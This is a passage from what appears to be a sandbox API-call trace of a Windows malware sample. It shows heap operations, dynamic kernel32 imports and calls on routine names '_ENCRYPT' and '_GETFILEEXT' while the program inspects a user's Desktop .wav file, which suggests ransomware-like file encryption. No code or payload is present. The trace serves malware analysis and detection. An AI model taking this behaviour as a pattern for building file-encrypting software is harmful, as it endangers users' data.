Size=0x10) returned 0x76abb0 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.664] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.664] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0075.665] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76adc0 | out: hHeap=0x650000) returned 1 [0075.665] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.665] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690900 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.666] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0075.666] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0075.666] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.667] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0075.667] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.667] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.667] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0075.667] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.667] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.667] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.668] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.668] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.668] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.669] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e558 [0075.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e558, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.669] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0075.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0075.669] CloseHandle (hObject=0x128) returned 1 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.669] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.669] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0075.670] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.670] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.670] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.670] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.671] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0075.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.671] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.671] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0075.671] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.671] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b818900, ftCreationTime.dwHighDateTime=0x1d5d8b1, ftLastAccessTime.dwLowDateTime=0x575d47f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0x575d47f0, ftLastWriteTime.dwHighDateTime=0x1d5e344, nFileSizeHigh=0x0, nFileSizeLow=0x12245, dwReserved0=0x0, dwReserved1=0x657690, cFileName="1SXWH1rq8k oa-Gv-.wav", cAlternateFileName="1SXWH1~1.WAV")) returned 0x6b89b8 [0075.671] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b818900, ftCreationTime.dwHighDateTime=0x1d5d8b1, ftLastAccessTime.dwLowDateTime=0x575d47f0, ftLastAccessTime.dwHighDateTime=0x1d5e344, ftLastWriteTime.dwLowDateTime=0x575d47f0, ftLastWriteTime.dwHighDateTime=0x1d5e344, nFileSizeHigh=0x0, nFileSizeLow=0x12245, dwReserved0=0x0, dwReserved1=0x657690, cFileName="1SXWH1rq8k oa-Gv-.wav", cAlternateFileName="1SXWH1~1.WAV")) returned 0x6b89b8 [0075.671] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS 